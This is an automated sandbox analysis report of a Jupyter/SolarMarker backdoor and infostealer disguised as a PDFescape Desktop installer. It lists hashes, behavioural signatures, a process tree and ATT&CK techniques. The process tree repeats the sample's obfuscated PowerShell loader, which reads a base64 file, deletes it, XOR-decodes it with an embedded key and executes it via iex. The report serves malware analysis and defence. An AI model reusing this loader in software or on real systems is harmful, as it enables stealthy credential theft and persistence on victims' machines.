Overview

overview

10

Static

static

8a5414b7aa...b1.exe

windows10_x64

10

Resubmissions

08-06-2021 18:11

210608-f4tsl5dzma 10

Analysis

  • max time kernel
    1799s
  • max time network
    1803s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-06-2021 18:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe

  • Size

    107.7MB

  • MD5

    e4b18058271e4c9bfc7e3759a6132437

  • SHA1

    70248c40ca94932a7f098a26ee7858bda5903d73

  • SHA256

    8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1

  • SHA512

    4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045

Score
10/10
jupyteradwarebackdoordiscoverypersistencestealertrojan

Malware Config

Signatures

  • Jupyter, SolarMarker

    Jupyter is a backdoor and infostealer first seen in mid 2020.

    backdoortrojanstealerjupyter
  • Registers COM server for autorun 1 TTPs
    persistence
  • Blocklisted process makes network request 20 IoCs
  • Executes dropped EXE 11 IoCs
  • Registers new Print Monitor 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 10 IoCs
  • Loads dropped DLL 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

    stealeradware
  • Drops file in System32 directory 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe
    "C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp" /SL5="$70050,111934780,999424,C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe
        "C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:2104
        • C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
          "C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer
          4⤵
          • Executes dropped EXE
          PID:3808
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3948
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2744
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3992
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4132
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4172
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4256
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4400
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4476
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}
    1⤵
    • Loads dropped DLL
    PID:400
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:18156
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:10120
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"
        2⤵
        • Loads dropped DLL
        PID:7700
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"
        2⤵
        • Loads dropped DLL
        PID:10824
      • C:\Windows\syswow64\MsiExec.exe
        "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"
        2⤵
        • Loads dropped DLL
        • Modifies Internet Explorer settings
        • Modifies registry class
        PID:13416
      • C:\Program Files\PDFescape Desktop\ws.exe
        "C:\Program Files\PDFescape Desktop\ws.exe" -service
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:16564
      • C:\Windows\System32\MsiExec.exe
        C:\Windows\System32\MsiExec.exe -Embedding 9E8863CFD48A74FEE4783E820437DD15 E Global\MSI0000
        2⤵
        • Loads dropped DLL
        PID:8076
      • C:\Program Files\PDFescape Desktop\updater-ws.exe
        "C:\Program Files\PDFescape Desktop\updater-ws.exe" -service
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:11140
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
        2⤵
        • Loads dropped DLL
        PID:19072
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies Internet Explorer settings
        • Modifies registry class
        PID:11876
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:14080
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:17588
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:2792
      • C:\Windows\syswow64\MsiExec.exe
        "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
        2⤵
        • Loads dropped DLL
        PID:7012
      • C:\Windows\syswow64\MsiExec.exe
        "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies Internet Explorer settings
        PID:12332
      • C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe
        "C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:13076
      • C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe
        "C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:8596
      • C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe
        "C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:10820
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5028
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
      1⤵
      • Checks SCSI registry key(s)
      • Modifies data under HKEY_USERS
      PID:14736
    • C:\Windows\System32\spoolsv.exe
      C:\Windows\System32\spoolsv.exe
      1⤵
      • Loads dropped DLL
      • Drops file in System32 directory
      • Checks SCSI registry key(s)
      • Modifies data under HKEY_USERS
      PID:13476
    • C:\Program Files\PDFescape Desktop\escape.exe
      "C:\Program Files\PDFescape Desktop\escape.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: AddClipboardFormatListener
      PID:11444
    • C:\Program Files\PDFescape Desktop\ws.exe
      "C:\Program Files\PDFescape Desktop\ws.exe"
      1⤵
      • Executes dropped EXE
      PID:4856
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:13580
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      PID:14668
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      PID:10116
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      PID:17224
    • C:\Program Files\PDFescape Desktop\updater-ws.exe
      "C:\Program Files\PDFescape Desktop\updater-ws.exe"
      1⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      PID:16656
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
        PID:12140
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
          PID:20788
        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
          1⤵
          • Modifies registry class
          PID:20064

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Registry Run Keys / Startup Folder

        2
        T1060

        Browser Extensions

        1
        T1176

        Privilege Escalation

        Defense Evasion

        Modify Registry

        4
        T1112

